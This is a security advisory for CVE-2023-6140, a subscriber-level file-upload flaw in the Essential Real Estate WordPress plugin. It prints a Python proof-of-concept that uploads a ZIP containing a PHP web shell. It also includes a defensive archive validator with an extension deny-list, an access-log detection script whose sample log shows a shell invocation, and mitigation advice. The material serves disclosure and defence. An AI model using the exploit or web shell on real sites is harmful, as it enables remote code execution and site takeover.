
CVE-2023-6140: Arbitrary File Upload Vulnerability in Essential Real Estate WordPress Plugin

Vulnerability Summary

  • CVE ID: CVE-2023-6140

  • Severity: High (CVSS 3.1 Score: 8.8)

  • Attack Vector: Network

  • Privileges Required: Low (Subscriber+)

  • User Interaction: None

  • Impact: Remote Code Execution (RCE)

Affected Products

Product                                  Affected Versions
Essential Real Estate WordPress Plugin   ≤ 4.3.5

How the Exploit Works

The Essential Real Estate plugin for WordPress fails to adequately validate file types during the font upload process. This oversight allows authenticated users with subscriber-level permissions or higher to upload arbitrary files, including PHP scripts disguised as ZIP archives. Once uploaded, these malicious files can be executed on the server, leading to remote code execution.

The vulnerability resides in the gsf_upload_fonts AJAX action, which lacks proper checks to prevent the upload of dangerous file types. An attacker can exploit this by crafting a ZIP archive containing a malicious PHP file and uploading it through the vulnerable endpoint.
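The missing check described above is validation of what the uploaded font archive actually contains. The following Python validator is an added example, not the plugin's code or its fix: it models the server-side check a font-upload handler should run before extracting anything (the real plugin is PHP, so this is a model of the logic rather than a drop-in patch). The allow-list of font extensions, the deny-list of server-executable extensions, the size limits, the magic-byte table and the three sample archives are all assumptions constructed for this example.

```python
import io
import posixpath
import zipfile

# Allow-list of what a font-upload endpoint legitimately needs, and a deny-list of
# extensions that must never land in a web-served upload directory. These sets,
# the size limits and the sample archives are assumptions made for this example.
ALLOWED_EXTENSIONS = {"ttf", "otf", "woff", "woff2", "eot", "css"}
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar",
                     "htaccess", "cgi", "pl", "py"}
# Leading bytes of the font formats we accept, so a PHP file renamed to .ttf is caught too.
FONT_MAGIC = {
    "ttf": (b"\x00\x01\x00\x00", b"true"),
    "otf": (b"OTTO",),
    "woff": (b"wOFF",),
    "woff2": (b"wOF2",),
}
MAX_ENTRIES = 50
MAX_UNCOMPRESSED_BYTES = 20 * 1024 * 1024


def entry_name_problems(name: str) -> list[str]:
    """Reasons to reject one archive entry based on its name alone."""
    problems = []
    # Traversal and absolute paths are checked first: the entry must stay inside
    # the font directory no matter what extension it carries.
    if "\\" in name or name.startswith("/") or ".." in name.split("/"):
        problems.append(f"{name}: absolute path or traversal")
    basename = posixpath.basename(name)
    if not basename:
        return problems  # directory entry; nothing else to check
    exts = basename.lower().split(".")[1:]
    if not exts:
        problems.append(f"{name}: no extension")
    elif any(e in SERVER_EXECUTABLE for e in exts):
        # Every extension in the chain is checked, so 'x.ttf.php' and 'x.php.ttf'
        # are both refused; a harmless final extension alone is not enough.
        problems.append(f"{name}: server-executable extension")
    elif exts[-1] not in ALLOWED_EXTENSIONS:
        problems.append(f"{name}: extension '{exts[-1]}' not in allow-list")
    return problems


def validate_font_archive(data: bytes) -> list[str]:
    """Return every reason to reject the upload; an empty list means accept."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    problems = []
    with zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries ({len(infos)})")
        if sum(i.file_size for i in infos) > MAX_UNCOMPRESSED_BYTES:
            problems.append("uncompressed size exceeds limit")
        for info in infos:
            problems.extend(entry_name_problems(info.filename))
            ext = info.filename.lower().rsplit(".", 1)[-1]
            if ext in FONT_MAGIC and not info.is_dir():
                with zf.open(info) as fh:
                    head = fh.read(4)
                if not head.startswith(FONT_MAGIC[ext]):
                    problems.append(f"{info.filename}: content does not match a {ext} font")
    return problems


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {name: content}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample uploads.
BENIGN_UPLOAD = build_archive({
    "myfont.ttf": b"\x00\x01\x00\x00" + b"\x00" * 60,  # TrueType header plus padding
    "style.css": b"@font-face { font-family: MyFont; src: url(myfont.ttf); }",
})
DISGUISED_UPLOAD = build_archive({            # the shape the PoC on this page produces
    "malicious.php": b"<?php /* placeholder */ ?>",
    "style.css": b"",
})
EVASIVE_UPLOAD = build_archive({              # traversal, double extension, renamed content
    "fonts/../evil.woff": b"not a font at all",
    "font.ttf.phtml": b"",
})

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_UPLOAD), ("disguised", DISGUISED_UPLOAD),
                        ("evasive", EVASIVE_UPLOAD)]:
        print(label, "->", validate_font_archive(blob) or "accepted")
```

The validator is deliberately layered: path checks, the whole extension chain, an allow-list rather than a deny-list alone, and a content sniff for the accepted font types. Rejecting at the first problem would be fine in production; returning all of them makes the decision auditable in logs.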

Conceptual Example Code

An attacker might use the following Python script to exploit the vulnerability:

import requests
from io import BytesIO
import zipfile

# Target URL and credentials
url = 'https://target-site.com'
username = 'subscriber_user'
password = 'password123'

# Start a session
session = requests.Session()

# Log in to WordPress
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': f'{url}/wp-admin/',
    'testcookie': 1
}
session.post(f'{url}/wp-login.php', data=login_data)

# Retrieve nonce
profile_page = session.get(f'{url}/wp-admin/profile.php')
nonce = 'extracted_nonce_value'  # Extract nonce from the profile_page content

# Create malicious ZIP file in memory
zip_buffer = BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file:
    zip_file.writestr('malicious.php', '<?php system($_GET["cmd"]); ?>')
    zip_file.writestr('style.css', '')  # Required file
zip_buffer.seek(0)

# Upload the malicious ZIP file
files = {'file_font': ('malicious.zip', zip_buffer, 'application/zip')}
data = {'_nonce': nonce, 'name': 'malicious_font'}
response = session.post(f'{url}/wp-admin/admin-ajax.php?action=gsf_upload_fonts', data=data, files=files)

print(response.text)

This script logs into the WordPress site using subscriber credentials, retrieves the necessary nonce, creates a malicious ZIP file containing a PHP shell, and uploads it via the vulnerable AJAX action.

Mitigation Recommendations

  • Update the Plugin: Upgrade to Essential Real Estate version 4.4.0 or later, which addresses this vulnerability.

  • Restrict File Uploads: Implement server-side checks to validate file types and restrict uploads to necessary formats only.

  • Limit User Permissions: Ensure that users have the minimum necessary permissions to perform their roles.

  • Monitor Server Activity: Regularly review server logs for suspicious activities, such as unexpected file uploads or executions.
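For the "Monitor Server Activity" recommendation, the following Python scanner is an added example and is not part of the original article. It runs over constructed Apache/Nginx combined-format access log lines and flags two things this vulnerability leaves behind: a POST to the gsf_upload_fonts AJAX action, and any request for a PHP file under /wp-content/uploads/, raising severity when the same client did both within a short window. The log lines, the documentation-range IPs, the timestamps and the upload path are all constructed for the example. One caveat worth building into any such rule: the action name only appears in the access log when it travels in the query string, as in the PoC above; an action sent in the POST body is invisible there and needs application-level logging or a WAF to observe.

```python
import re
from datetime import datetime, timedelta

# Apache/Nginx combined log format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_ACTION = "action=gsf_upload_fonts"
# Anything server-executable being requested under the uploads tree.
UPLOADS_PHP_RE = re.compile(
    r"^/wp-content/uploads/.*\.ph(?:p\d?|tml|ar)(?:$|[/?])", re.IGNORECASE
)


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def scan_access_log(lines, window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """Flag font-upload POSTs and PHP requests under uploads; correlate them per client."""
    findings = []
    last_upload = {}  # client IP -> timestamp of its most recent font-upload POST
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, ts = rec["ip"], rec["path"], rec["ts"]
        if rec["method"] == "POST" and "/admin-ajax.php" in path and UPLOAD_ACTION in path:
            # Only visible when the action rides in the query string, as in the PoC;
            # an action in the POST body needs application logging or a WAF.
            last_upload[ip] = ts
            findings.append({"rule": "font-upload-request", "severity": "info",
                             "ip": ip, "path": path, "status": rec["status"]})
        elif UPLOADS_PHP_RE.match(path):
            prior = last_upload.get(ip)
            correlated = prior is not None and timedelta(0) <= ts - prior <= window
            findings.append({"rule": "php-under-uploads",
                             "severity": "high" if correlated else "medium",
                             "ip": ip, "path": path, "status": rec["status"]})
    return findings


# Constructed sample log: documentation-range IPs and an invented upload path.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2024:10:15:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4512
203.0.113.5 - - [12/Jan/2024:10:15:30 +0000] "POST /wp-admin/admin-ajax.php?action=gsf_upload_fonts HTTP/1.1" 200 87
203.0.113.5 - - [12/Jan/2024:10:16:02 +0000] "GET /wp-content/uploads/fonts/malicious_font/malicious.php?cmd=id HTTP/1.1" 200 312
198.51.100.7 - - [12/Jan/2024:10:20:00 +0000] "GET /wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 90210
198.51.100.7 - - [12/Jan/2024:10:21:00 +0000] "GET /wp-content/uploads/cache/x.php HTTP/1.1" 404 210
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']:<6}] {f['rule']:<20} {f['ip']:<14} {f['status']} {f['path']}")
```

A request for a PHP file under the uploads directory is worth alerting on even without the upload correlation, because nothing legitimate should be executable there; pairing this detection with a web-server rule that refuses to execute PHP under /wp-content/uploads/ turns the same condition into a preventive control.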

Conclusion

CVE-2023-6140 is a critical vulnerability in the Essential Real Estate WordPress plugin that allows authenticated users with minimal permissions to upload and execute arbitrary PHP files, leading to potential full site compromise. Administrators should promptly update the plugin and implement the recommended security measures to protect their websites.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.
